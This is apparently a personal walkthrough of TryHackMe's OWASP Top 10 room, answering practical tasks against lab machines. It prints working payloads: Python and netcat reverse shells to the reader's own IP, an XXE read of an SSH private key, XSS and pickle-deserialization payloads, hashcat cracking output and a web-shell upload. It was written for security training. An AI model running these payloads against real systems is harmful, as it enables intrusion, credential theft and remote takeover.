OWASP Top 10 - TryHackMe (Only practical tasks)

Task 5 : [Severity 1] Command Injection Practical

Go to the link mine was a http://10.10.163.167/evilshell.php

1. What strange text file is in the website root directory?
   (when you use ‘ls’ command in a web shell)

drpepper.txt

2. How many non-root/non-service/non-daemon users are there?
   (You can see them on the passwd file, simply use the command cat /etc/passwd and look for the users)

0

3. What user is this app running as?
   (Simply you can use ‘whoami’ command to who is the user)

www-data

4. What is the user’s shell set as? (cat the etc/passwd)

/usr/sbin/nologin

5. What version of Ubuntu is running?
   (You can use ‘lsb-release -a’ to watch the version number)

18.04.4

6. Print out the MOTD. What favorite beverage is shown?
   (You can ‘cat’ that file like this: cat /etc/update-motd.d/00-header)

DR PEPPER

Since we can do command injection lets get a reverse shell!

/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Task 7 :[Severity 2] Broken Authentication Practical

My IP was http://10.10.207.113:8888 . so go to the link and register with darren and some example email and give the password. then log into the account (use space and name). after that you can see the flag. Do samething with arthur.

Task 8 :[Severity 3] Sensitive Data Exposure (Introduction)

$IP go to the ip mine was http://10.10.66.141/

1. What is the name of the mentioned directory?

Look at that hint they said about login page http://10.10.66.141/login/
go and view the page source, now you can see comment like this so answer was the /assets

<!-- Must remember to do something better with the database than store it in /assets... -->

If you try this IP address scan with nmap you can see some open ports
go chack each one of them :)

2. Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Now go to the http://10.10.66.141/assets/ at last you can see the webapp.db file.

3. Use the supporting material to access the sensitive data. What is the password hash of the admin user?

you can get this file simply click on this or wget that file ‘wget http://10.10.66.141/assets/webapp.db’ like this.

sqlite> PRAGMA table_Info(users);
0|userID|TEXT|1||1
1|username|TEXT|1||0
2|password|TEXT|1||0
3|admin|INT|1||0
sqlite> select * From users;
4413096d9c933359b898b6202288a650|admin|6eea9b7ef19179a06954edd0f6c05ceb|1
23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0
sqlite> 

4. What is the admin’s plaintext password?

Here You can use this crackstation

or you can use cyberchef to crack this md5 hash or You can use hashcat

hashcat -m 0 hash <wordllist>

Output:

┌─[visith@parrot]─[~/CTF/thm/owasp]
└──╼ $hashcat -m 0 6eea9b7ef19179a06954edd0f6c05ceb /opt/SecLists/Passwords/2020-200_most_used_passwords.txt
----snip----
Approaching final keyspace - workload adjusted.  

6eea9b7ef19179a06954edd0f6c05ceb:qwertyuiop      
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: 6eea9b7ef19179a06954edd0f6c05ceb
Time.Started.....: Mon May 24 20:02:17 2021 (0 secs)
Time.Estimated...: Mon May 24 20:02:17 2021 (0 secs)
Guess.Base.......: File (/opt/SecLists/Passwords/2020-200_most_used_passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     2987 H/s (0.03ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 200/200 (100.00%)
Rejected.........: 0/200 (0.00%)
Restore.Point....: 0/200 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> angel1

5. Login as the admin. What is the flag?
   Go to the login page and slap that credentials if you successesfully log in you can see the flag.

Task 16 :[Severity 4] XML External Entity - Exploiting

5. What are the first 18 characters for falcon’s private key?
   In the previous we found out where is the falcons ssh key locate. So we can change that payload to take the falcons ssh key like this :

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///home/falcon/.ssh/id_rsa'>]><root>&test;</root>

when you get the key count first character 18 and submit it

Task 18 :[Severity 5] Broken Access Control (IDOR Challenge)

3. Look at other users notes. What is the flag?

when you go in to the http://10.10.97.22/ you can see the login.
go ahead and log in to the noot account with given credentials. Then you can see the ‘I am noot’ .

So our task is simple we need to change the parameter value

http://10.10.97.22/note.php?note=1

Here one (1) is the parameter value , we can simply change it. But we don’t know extractly correct value of our flag stored page. So you can fire up burp and send above link to intruder and start a attack with number payload.

How to do the IDOR attack with burp

we go the hit on zero(0). when we simply click value zero we can see the flag or you can go to the page by updating value to zero.

Task 19 :[Severity 6] Security Misconfiguration

2. Hack into the webapp, and find the flag!?

Hint :Can you find the app’s source code? Maybe the documentation gives you default credentials that you can try.

In the hints they said we need to look at into the app source code. when you simply search it on google you can see the github page. They provided the default credentials in README.md .

Task 20 : [Severity 7] Cross-site Scripting

2. Navigate to http://10.10.122.166/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”?

Here you can see the search bar option in reflected xss area. so we can perform our xss script.

<script>alert("Hello")</script>

after you search this hello will popup. after we ‘ok’ it. In the another prompt you can see the our flag or answer whatever.

3. On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address ?

Hint:In Javascript window.location.hostname will show your hostname, in this case your deployed machine’s hostname will be its IP.

Here we can simply change our java script like this.

<script>alert("window.location.hostname")</script>

4. Then add a comment and see if you can insert some of your own HTML?

when you go into the site you can click here for hints link. then you redirect into the /stored# site . after that you can see the page source to hints.

here you need to create a account and go back to the stored xss. In here we can comment.

<html>
<body>
<h1>Button defalt</h1>
<button type="button" onclick="alert('Hello')">Click Me</button>
</body>
</html>

after you executed it click the create button. here we go we can take a answer to first question.

5. On the same page, create an alert popup box appear on the page with your document cookies?

<script>alert(document.cookies)</script>

when you type in comment box you can get a cokkie values and flag.

6. Change “XSS Playground” to “I am a hacker” by adding a comment and using Javascript?

Take a look into the Hints. You can see this js code.

<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>

Now we got the answer to question 3.

Task 25 :[Severity 8] Insecure Deserialization - Cookies Practical

When you go to the machine gives you in the Task 21 You can see the beautiful web page.

1. 1st flag (cookie value) ?

when you go into the “Inspect Element” and Navigate to the “Storage” tab. You can see the cookies, go ahead get the session id value and decode it in base 64.

echo <value> | base64 -d

Here you can get the first flag.

2. 2nd flag (admin dashboard) ?

When you go into the http://10.10.141.135/admin and get the flag.

Task 26 : [Severity 8] Insecure Deserialization - Code Execution

First you need to create a netcat listner

nc -lnvp 9999

then we need to make our exploit.py file . Notice : You need to put your vpn IP (tun0)

#!/usr/bin/env/ python3
import pickle
import sys
import base64

command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat <Your $IP> 9999 > /tmp/f' 

class rce(object):    
    def __reduce__(self):        
        import os        
        return (os.system,(command,)) 
print(base64.b64encode(pickle.dumps(rce())))

after we executed it we can get a cookie. Now we need to replace the our cookie with original one after that reload the page and finally we can get our netcat shell.

For get a normal shell :

script -qc /bin/bash/ /dev/null

┌─[visith@parrot]─[~/CTF/thm/owasp]
└──╼ $nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.9.2.175] from (UNKNOWN) [10.10.186.100] 59234
/bin/sh: 0: can't access tty; job control turned off
$ script -qc /bin/bash /dev/null
cmnatic@owasp10-a8-cmnatic:~/app$ ls
ls
app.py      launch.sh         static     venv
Dockerfile  __pycache__       templates  vimexchange.sock
index.html  requirements.txt  user.html  wsgi.py
cmnatic@owasp10-a8-cmnatic:~/app$ cd ..
cd ..
cmnatic@owasp10-a8-cmnatic:~$ ls
ls
app  flag.txt  launch.log

Task 29 :[Severity 9] Components With Known Vulnerabilities - Lab

1. How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

we know the store name is CSE store now we need to search for vunerabilities for this web app.

Here is the exploit-db site for this web app.

Link to the exploit

┌─[visith@parrot]─[~/CTF/thm/owasp]
└──╼ $python exploit.py http://10.10.184.133/
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.184.133/bootstrap/img/DjEVX5UcgG.php
> Example command usage: http://10.10.184.133/bootstrap/img/DjEVX5UcgG.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ ls
4Bp1GgO6Ye.php
DjEVX5UcgG.php
I9DXsSGS3d.php

we got the www-data shell now we need to use wc -c/etc/passwd to get answer.